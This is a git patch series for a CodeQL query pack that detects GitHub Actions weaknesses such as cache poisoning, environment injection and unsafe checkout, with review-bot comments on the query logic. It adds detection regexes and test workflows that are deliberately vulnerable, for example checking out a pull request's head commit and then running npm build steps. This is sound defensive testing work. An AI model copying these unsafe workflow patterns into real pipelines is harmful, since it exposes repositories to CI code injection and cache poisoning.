| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 1f90c56607df..92d5a0b5ce18 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -4,6 +4,5 @@ | .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index 9adfa3cee7cc..544d26da9b74 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -1,2 +1,3 @@ | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 28af21c556237ec784e0b0e1e1ae22c2484514c4 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 5 Jun 2024 08:57:43 +0200 Subject: [PATCH 317/707] Update ql suites --- ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll | 5 +++-- ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll | 5 +++-- ql/src/Debug/partial.ql | 2 ++ ql/src/codeql-suites/actions-all.qls | 4 ++++ ql/src/codeql-suites/actions-code-scanning.qls | 2 ++ 5 files changed, 14 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 302e8d5bb8d3..cd049cccf4ed 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -13,8 +13,9 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and writeToGitHubPath(run, value) and - // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + // (eg: echo DATABASE_SHA=`yq '.creationMetadata.sha' codeql-database.yml` >> $GITHUB_ENV) + value + .regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<", "jq\\s+", "yq\\s+"] + ".*" + ["`", "\\)"]) ) } } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index ead69480d8a5..a692c6e58741 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll 
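Review bot: `regexpMatch` matches the whole string, and the extended pattern still has to begin with `\$\(` or a backtick and end with the closing delimiter, so a value with surrounding text (constructed example: `v$(cat version.txt)-build`) is not recognised by the sink even though it reads a file; if the intent is to detect any embedded file read, the pattern needs `".*"` on both sides, e.g. `.regexpMatch(".*" + ["\\$\\(", "`"] + ["cat\\s+", "<", "jq\\s+", "yq\\s+"] + ".*" + ["`", "\\)"] + ".*")`. The identical regular expression is duplicated in the EnvVarInjectionQuery.qll hunk that follows, and this commit had to update both copies by hand; a single shared predicate for "value is a file-read expression" would keep the two sinks from drifting apart. The `(eg: ...)` comment that replaced the TODO shows only the `yq` case; listing the `jq` form too would document why both were added. The constructor of `EnvPathInjectionFromFileReadSink` starts outside the hunk.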
@@ -26,8 +26,9 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { step.getAFollowingStep() = run and writeToGitHubEnv(run, content) and extractVariableAndValue(content, _, value) and - // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + // (eg: echo DATABASE_SHA=`yq '.creationMetadata.sha' codeql-database.yml` >> $GITHUB_ENV) + value + .regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<", "jq\\s+", "yq\\s+"] + ".*" + ["`", "\\)"]) ) } } diff --git a/ql/src/Debug/partial.ql b/ql/src/Debug/partial.ql index 27cad8b98a43..cb8ba7873d8c 100644 --- a/ql/src/Debug/partial.ql +++ b/ql/src/Debug/partial.ql @@ -5,6 +5,8 @@ * @precision low * @problem.severity error * @id actions/test-dataflow + * @tags actions + * debug */ import actions diff --git a/ql/src/codeql-suites/actions-all.qls b/ql/src/codeql-suites/actions-all.qls index 32b9b5800cd5..be9be8666201 100644 --- a/ql/src/codeql-suites/actions-all.qls +++ b/ql/src/codeql-suites/actions-all.qls @@ -4,3 +4,7 @@ kind: - problem - path-problem +- exclude: + tags contain: + - debug + - model-generator diff --git a/ql/src/codeql-suites/actions-code-scanning.qls b/ql/src/codeql-suites/actions-code-scanning.qls index 7d6c94e0c8c8..d0fd74736ce7 100644 --- a/ql/src/codeql-suites/actions-code-scanning.qls +++ b/ql/src/codeql-suites/actions-code-scanning.qls @@ -17,3 +17,5 @@ tags contain: - experimental - testing + - debug + - model-generator From 284c52f9728b1e302ba48eba369e585672afdcb2 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 5 Jun 2024 10:54:37 +0200 Subject: [PATCH 318/707] Bump qlpack versions --- .../actions/security/CachePoisoningQuery.qll | 61 ++++++++----------- ql/lib/qlpack.yml | 2 +- ql/src/Security/CWE-349/CachePoisoning.ql | 22 +++++-- .../CWE-349/CachePoisoningByCodeInjection.ql | 24 +++++--- ql/src/qlpack.yml | 2 +- .../CWE-349/.github/workflows/test18.yml | 31 ++++++++++ 6 files changed, 91 insertions(+), 51 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test18.yml diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 318548859b55..e80ea71c958a 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll 
@@ -17,51 +17,40 @@ string defaultBranchNames() {
result = default_branch_name
)
or
- not exists(string default_branch_name |
- repositoryDataModel(_, default_branch_name)
- ) and
+ not exists(string default_branch_name | repositoryDataModel(_, default_branch_name)) and
result = ["main", "master"]
}

-predicate runsOnDefaultBranch(Job j) {
- exists(Event e |
- j.getATriggerEvent() = e and
+predicate runsOnDefaultBranch(Event e) {
+ (
+ e.getName() = defaultBranchTriggerEvent() and
+ not e.getName() = "pull_request_target"
+ or
+ e.getName() = "push" and
+ e.getAPropertyValue("branches") = defaultBranchNames()
+ or
+ e.getName() = "pull_request_target" and
(
- e.getName() = defaultBranchTriggerEvent() and
- not e.getName() = "pull_request_target"
+ // no filtering
+ not e.hasProperty("branches") and not e.hasProperty("branches-ignore")
or
- e.getName() = "push" and
+ // only branches-ignore filter
+ e.hasProperty("branches-ignore") and
+ not e.hasProperty("branches") and
+ not e.getAPropertyValue("branches-ignore") = defaultBranchNames()
+ or
+ // only branches filter
+ e.hasProperty("branches") and
+ not e.hasProperty("branches-ignore") and
e.getAPropertyValue("branches") = defaultBranchNames()
or
- e.getName() = "pull_request_target" and
- (
- // no filtering
- not e.hasProperty("branches") and not e.hasProperty("branches-ignore")
- or
- // only branches-ignore filter
- e.hasProperty("branches-ignore") and
- not e.hasProperty("branches") and
- not e.getAPropertyValue("branches-ignore") = defaultBranchNames()
- or
- // only branches filter
- e.hasProperty("branches") and
- not e.hasProperty("branches-ignore") and
- e.getAPropertyValue("branches") = defaultBranchNames()
- or
- // branches and branches-ignore filters
- e.hasProperty("branches") and
- e.hasProperty("branches-ignore") and
- e.getAPropertyValue("branches") = defaultBranchNames() and
- not e.getAPropertyValue("branches-ignore") = defaultBranchNames()
- )
+ // branches and branches-ignore filters
+ e.hasProperty("branches") and
+ e.hasProperty("branches-ignore") and
+ e.getAPropertyValue("branches") = defaultBranchNames() and
+ not e.getAPropertyValue("branches-ignore") = defaultBranchNames()
)
)
- or
- j.getATriggerEvent().getName() = "workflow_call" and
- exists(ExternalJob call |
- call.getCallee() = j.getLocation().getFile().getRelativePath() and
- runsOnDefaultBranch(call)
- )
}

abstract class CacheWritingStep extends Step { }
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 9acfb3035a41..bf05e80e0a60 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
library: true
warnOnImplicitThis: true
name: githubsecuritylab/actions-all
-version: 0.0.32
+version: 0.0.33
dependencies:
codeql/util: ^0.2.0
codeql/yaml: ^0.1.2
diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql
index d81c13021c17..a6dc7e14fdd4 100644
--- a/ql/src/Security/CWE-349/CachePoisoning.ql
+++ b/ql/src/Security/CWE-349/CachePoisoning.ql
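Review bot: Dropping the `workflow_call` disjunct from `runsOnDefaultBranch` also drops its recursion: the callers in the CachePoisoning.ql and CachePoisoningByCodeInjection.ql hunks below evaluate `runsOnDefaultBranch(caller.getATriggerEvent())` once, so a reusable workflow reached through two levels of `workflow_call` is no longer treated as running on the default branch, whereas the removed `runsOnDefaultBranch(call)` handled that transitively. If the narrowing is intended, a comment at the new predicate saying that only one level of reuse is followed would set expectations; otherwise the transitive case belongs in a job-level helper shared by both queries, sketched below, so the two queries do not duplicate it. Separately, the `push` arm checks only `branches` against `defaultBranchNames()`, while the `pull_request_target` arm also handles `branches-ignore`; whether an unfiltered `push` is covered depends on `defaultBranchTriggerEvent()`, which is defined outside the hunk, so a comment stating that only exact branch names (no globs) are recognised would help.
```ql
// … unchanged: defaultBranchNames(), runsOnDefaultBranch(Event e) …

/** Holds if `j` runs on the default branch, following `workflow_call` chains transitively. */
predicate runsOnDefaultBranchTransitively(Job j) {
  runsOnDefaultBranch(j.getATriggerEvent())
  or
  j.getATriggerEvent().getName() = "workflow_call" and
  exists(ExternalJob caller |
    caller.getCallee() = j.getLocation().getFile().getRelativePath() and
    runsOnDefaultBranchTransitively(caller)
  )
}
```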
@@ -16,15 +16,25 @@ import codeql.actions.security.UntrustedCheckoutQuery
import codeql.actions.security.CachePoisoningQuery
import codeql.actions.security.PoisonableSteps

-from LocalJob j, PRHeadCheckoutStep checkout, Step s
+from LocalJob j, Event e, PRHeadCheckoutStep checkout, Step s
where
- // the workflow runs in the context of the default branch
- runsOnDefaultBranch(j) and
+ j.getATriggerEvent() = e and
+ // job can be triggered by an external user
+ e.isExternallyTriggerable() and
+ (
+ // the workflow runs in the context of the default branch
+ runsOnDefaultBranch(e)
+ or
+ // the workflow caller runs in the context of the default branch
+ e.getName() = "workflow_call" and
+ exists(ExternalJob caller |
+ caller.getCallee() = j.getLocation().getFile().getRelativePath() and
+ runsOnDefaultBranch(caller.getATriggerEvent())
+ )
+ ) and
// the job checkouts untrusted code from a pull request
// TODO: Consider adding artifact downloads as a potential source of cache poisoning
j.getAStep() = checkout and
- // job can be triggered by an external user
- j.getATriggerEvent().isExternallyTriggerable() and
(
// the job writes to the cache
// (No need to follow the checkout step as the cache writing is normally done after the job completes)
@@ -35,7 +45,7 @@ where
// (The cache specific token can be leaked even for non-privileged workflows)
checkout.getAFollowingStep() = s and
s instanceof PoisonableStep and
- // excluding privileged workflows since they can be easily exploited in similar circumstances
+ // excluding privileged workflows since they can be exploited in easier circumstances
not j.isPrivileged()
)
select checkout, "Potential cache poisoning in the context of the default branch on step $@.", s,
diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql
index 5ed3c966ad31..8fdebdbde188 100644
--- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql
+++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql
@@ -17,16 +17,26 @@ import codeql.actions.security.CodeInjectionQuery
import codeql.actions.security.CachePoisoningQuery
import CodeInjectionFlow::PathGraph

-from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, LocalJob j
+from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, LocalJob j, Event e
where
- CodeInjectionFlow::flowPath(source, sink) and
- j = sink.getNode().asExpr().getEnclosingJob() and
+ j.getATriggerEvent() = e and
// job can be triggered by an external user
- j.getATriggerEvent().isExternallyTriggerable() and
- // excluding privileged workflows since they can be easily exploited in similar circumstances
+ e.isExternallyTriggerable() and
+ (
+ // the workflow runs in the context of the default branch
+ runsOnDefaultBranch(e)
+ or
+ // the workflow caller runs in the context of the default branch
+ e.getName() = "workflow_call" and
+ exists(ExternalJob caller |
+ caller.getCallee() = j.getLocation().getFile().getRelativePath() and
+ runsOnDefaultBranch(caller.getATriggerEvent())
+ )
+ ) and
+ // excluding privileged workflows since they can be exploited in easier circumstances
not j.isPrivileged() and
- // The workflow runs in the context of the default branch
- runsOnDefaultBranch(j)
+ CodeInjectionFlow::flowPath(source, sink) and
+ j = sink.getNode().asExpr().getEnclosingJob()
select sink.getNode(), source, sink,
"Unprivileged code injection in $@, which may lead to cache poisoning.", sink,
sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 5637bef68a03..2f79bddd77e5 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries
-version: 0.0.32
+version: 0.0.33
groups: - actions - queries
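Review bot: Binding `e` once and requiring `e.isExternallyTriggerable()` ahead of the `e.getName() = "workflow_call"` disjunct makes that disjunct depend on `workflow_call` being classified as externally triggerable; if `Event.isExternallyTriggerable()` (defined outside this hunk) does not hold for `workflow_call`, the new caller-on-default-branch case can never match, here in CachePoisoning.ql and likewise in the CachePoisoningByCodeInjection.ql hunk below. If it does hold, a comment above the disjunct, `// workflow_call counts as externally triggerable through its caller`, makes the dependency explicit; if it does not, the `isExternallyTriggerable()` conjunct should be moved inside the `runsOnDefaultBranch(e)` arm. Note also that the previous query let the default-branch event and the externally-triggerable event be two different triggers of the same job, whereas the new form requires a single event to satisfy both; that reads as a deliberate tightening, but the commit message does not say so and the expected files for CWE-349 are not touched, so it is worth confirming no existing result was lost.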
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test18.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test18.yml new file mode 100644 index 000000000000..6bfdc5b7d50a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test18.yml @@ -0,0 +1,31 @@ +name: Test + +on: + pull_request: + push: + branches: + - main + - 'releases/*' + +jobs: + verify-build: + runs-on: ubuntu-latest + + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version-file: .nvmrc + + - name: Install NPM dependencies + run: npm ci + + - name: Rebuild the dist/ directory + run: npm run build + + - name: Compare the expected and actual dist/ directories + run: bin/check-build-output-in-dist-directory From 2c96127425896a9f6433970dae012676d0745896 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 5 Jun 2024 16:34:52 +0200 Subject: [PATCH 319/707] Improve event context sources + test --- ql/lib/codeql/actions/dataflow/FlowSources.qll | 2 +- .../Security/CWE-094/.github/workflows/test6.yml | 16 ++++++++++++++++ 2 files changed, 17 insertions(+), 1 deletion(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 5f2d36e7cd80..7217796d138b 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -200,7 +200,7 @@ class GitHubEventCtxSource extends RemoteFlowSource { or regexp = pathEvent() and flag = "filename" ) and - normalizeExpr(context).regexpMatch("(?i).*" + wrapRegexp(regexp) + ".*") + normalizeExpr(context).regexpMatch("(?i)\\s*" + wrapRegexp(regexp) + ".*") ) } 
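Review bot: Anchoring the source pattern with `(?i)\s*` instead of `(?i).*` drops every expression in which the event property does not come first, which is right for boolean-valued wrappers like the `contains(github.event.comment.body, ...)` case in the new test6.yml, but also drops content-preserving forms such as `toJSON(github.event.comment.body)` or `format('{0}', github.event.comment.body)` unless `normalizeExpr` (defined outside the hunk) unwraps them first. A regression test for one of those forms would pin the intended scope, together with a comment on the changed line: `// anchored at the start so that boolean-valued wrappers such as contains() are not reported as sources; content-preserving wrappers are assumed to be unwrapped by normalizeExpr`. The constructor of `GitHubEventCtxSource` starts outside the hunk.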
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml new file mode 100644 index 000000000000..535b9bd24bef --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml @@ -0,0 +1,16 @@ +name: Test +on: + issue_comment: + +permissions: + contents: write + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: | + { + echo "recreate_vm=${{ contains(github.event.comment.body, 'recreate-vm') }}" + } >> $GITHUB_OUTPUT + From d344d9b97ad8811b8d2b72953bff3b7516744825 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 6 Jun 2024 17:23:10 +0200 Subject: [PATCH 320/707] Update to latest dataflow shared library --- ql/lib/codeql-pack.lock.yml | 12 +- ql/lib/codeql/actions/DataFlow.qll | 9 +- ql/lib/codeql/actions/TaintTracking.qll | 5 +- .../internal/DataFlowImplSpecific.qll | 3 +- .../dataflow/internal/DataFlowPrivate.qll | 39 ++++- .../dataflow/internal/DataFlowPublic.qll | 2 +- .../internal/TaintTrackingImplSpecific.qll | 3 +- .../internal/TaintTrackingPrivate.qll | 8 +- ql/lib/qlpack.gbo | 13 -- ql/lib/qlpack.yml | 8 +- ql/test/codeql-pack.lock.yml | 12 +- .../CWE-020/CompositeActionsSinks.expected | 8 +- .../CWE-020/CompositeActionsSources.expected | 6 +- .../CompositeActionsSummaries.expected | 6 +- .../CWE-020/ReusableWorkflowsSinks.expected | 2 +- .../CWE-020/ReusableWorkflowsSources.expected | 6 +- .../ReusableWorkflowsSummaries.expected | 10 +- .../CWE-077/EnvPathInjectionCritical.expected | 12 +- .../CWE-077/EnvPathInjectionMedium.expected | 12 +- .../CWE-077/EnvVarInjectionCritical.expected | 24 +-- .../CWE-077/EnvVarInjectionMedium.expected | 24 +-- .../CWE-094/CodeInjectionCritical.expected | 160 +++++++++--------- .../CWE-094/CodeInjectionMedium.expected | 160 +++++++++--------- .../ArtifactPoisoningCritical.expected | 26 +-- .../CWE-829/ArtifactPoisoningMedium.expected | 26 +-- 25 files changed, 310 insertions(+), 286 deletions(-) delete mode 100644 ql/lib/qlpack.gbo diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index 84a6ccba26dc..4b8239b7f6ca 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml @@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 0.1.8 + version: 1.0.0 codeql/dataflow: - version: 0.1.8 + version: 1.0.0 codeql/ssa: - version: 0.2.8 + version: 1.0.0 codeql/typetracking: - version: 0.2.8 + version: 1.0.0 codeql/util: - version: 0.2.8 + version: 1.0.0 codeql/yaml: - version: 0.1.5 + version: 1.0.0 compiled: false 
diff --git a/ql/lib/codeql/actions/DataFlow.qll b/ql/lib/codeql/actions/DataFlow.qll index 1e30061bf459..feafe4f68bb0 100644 --- a/ql/lib/codeql/actions/DataFlow.qll +++ b/ql/lib/codeql/actions/DataFlow.qll @@ -2,18 +2,21 @@ * Provides classes for performing local (intra-procedural) and * global (inter-procedural) data flow analyses. */ + +import codeql.Locations + module DataFlow { private import codeql.dataflow.DataFlow private import codeql.actions.dataflow.internal.DataFlowImplSpecific - import DataFlowMake + import DataFlowMake import codeql.actions.dataflow.internal.DataFlowPublic // debug private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific import codeql.dataflow.internal.DataFlowImplConsistency as DFIC - module ActionsConsistency implements DFIC::InputSig { } + module ActionsConsistency implements DFIC::InputSig { } module Consistency { - import DFIC::MakeConsistency + import DFIC::MakeConsistency } } diff --git a/ql/lib/codeql/actions/TaintTracking.qll b/ql/lib/codeql/actions/TaintTracking.qll index 16d5d826aa88..8203a54dfebd 100644 --- a/ql/lib/codeql/actions/TaintTracking.qll +++ b/ql/lib/codeql/actions/TaintTracking.qll @@ -2,9 +2,12 @@ * Provides classes for performing local (intra-procedural) and * global (inter-procedural) taint-tracking analyses. */ + +import codeql.Locations + module TaintTracking { private import codeql.actions.dataflow.internal.DataFlowImplSpecific private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific private import codeql.dataflow.TaintTracking - import TaintFlowMake + import TaintFlowMake } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll index 2d3b9696ef65..2e3c13f164c2 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll 
@@ -4,8 +4,9 @@ */ private import codeql.dataflow.DataFlow +private import codeql.Locations -module ActionsDataFlow implements InputSig { +module ActionsDataFlow implements InputSig { import DataFlowPrivate as Private import DataFlowPublic import Private diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index b6b7cd539279..17b29f57025c 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -1,3 +1,4 @@ +private import codeql.util.Unit private import codeql.dataflow.DataFlow private import codeql.actions.Ast private import codeql.actions.Cfg as Cfg @@ -8,6 +9,8 @@ private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.dataflow.FlowSteps private import codeql.actions.dataflow.FlowSources +class DataFlowSecondLevelScope = Unit; + cached newtype TNode = TExprNode(DataFlowExpr e) @@ -78,6 +81,9 @@ class DataFlowCall instanceof Cfg::Node { string getName() { result = super.getAstNode().(Uses).getCallee() } DataFlowCallable getEnclosingCallable() { result = super.getScope() } + + /** Gets a best-effort total ordering. */ + int totalorder() { none() } } /** @@ -104,6 +110,9 @@ class DataFlowCallable instanceof Cfg::CfgScope { .indexOf(["/action.yml", "/action.yaml"])) else none() } + + /** Gets a best-effort total ordering. */ + int totalorder() { none() } } newtype TReturnKind = TNormalReturn() 
@@ -158,6 +167,19 @@ newtype TContent = predicate forceHighPrecision(Content c) { c instanceof FieldContent } +class NodeRegion instanceof Unit { + string toString() { result = "NodeRegion" } + + predicate contains(Node n) { none() } + + int totalOrder() { result = 1 } +} + +/** + * Holds if the nodes in `nr` are unreachable when the call context is `call`. + */ +predicate isUnreachableInCall(NodeRegion nr, DataFlowCall call) { none() } + class ContentApprox = ContentSet; ContentApprox getContentApprox(Content c) { result = c } @@ -287,9 +309,13 @@ predicate localFlowStep(Node nodeFrom, Node nodeTo) { } /** - * a simple local flow step that should always preserve the call context (same callable) + * This is the local flow predicate that is used as a building block in global + * data flow. */ -predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } +cached +predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo, string model) { + localFlowStep(nodeFrom, nodeTo) and model = "" +} /** * Holds if data can flow from `node1` to `node2` through a non-local step @@ -366,11 +392,6 @@ predicate clearsContent(Node n, ContentSet c) { none() } */ predicate expectsContent(Node n, ContentSet c) { none() } -/** - * Holds if the node `n` is unreachable when the call context is `call`. - */ -predicate isUnreachableInCall(Node n, DataFlowCall call) { none() } - /** * Holds if flow is allowed to pass from parameter `p` and back to itself as a * side-effect, resulting in a summary from `p` to itself. @@ -400,3 +421,7 @@ predicate additionalLambdaFlowStep(Node nodeFrom, Node nodeTo, boolean preserves * This compression is normally done to not show SSA steps, casts, etc. */ predicate neverSkipInPathGraph(Node node) { any() } + +predicate knownSourceModel(Node source, string model) { none() } + +predicate knownSinkModel(Node sink, string model) { none() } 
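Review bot: `knownSourceModel` and `knownSinkModel` at the end of the file are added without the QLDoc comment that every neighbouring predicate carries (`neverSkipInPathGraph` directly above them shows the house style), and the same applies to `DataFlowSecondLevelScope` in the earlier hunk of this file. Suggest `/** Holds if `source` is a known source with model `model`; the Actions library defines no source models, so this never holds. */`, the corresponding sentence on the sink predicate, and `/** Second-level scopes are not used by the Actions data flow; `Unit` is a single-valued placeholder. */` on the alias. `NodeRegion` does carry `toString`/`contains`/`totalOrder` but no class-level comment saying that the single `Unit` region contains no node, which is what makes `isUnreachableInCall` trivially `none()`.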
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 87e8124db916..96568f86db33 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -178,7 +178,7 @@ class FieldContent extends Content, TFieldContent { predicate hasLocalFlow(Node n1, Node n2) { n1 = n2 or - simpleLocalFlowStep(n1, n2) or + simpleLocalFlowStep(n1, n2, _) or exists(ContentSet c | ctxFieldReadStep(n1, n2, c)) } diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll index c2d51748f20f..2fd062e76607 100644 --- a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll +++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll @@ -3,9 +3,10 @@ * Implementation of https://github.com/github/codeql/blob/main/shared/dataflow/codeql/dataflow/TaintTracking.qll */ +private import codeql.Locations private import codeql.dataflow.TaintTracking private import DataFlowImplSpecific -module ActionsTaintTracking implements InputSig { +module ActionsTaintTracking implements InputSig { import TaintTrackingPrivate } diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll index a7e0d23df2b4..b8647339d24c 100644 --- a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll 
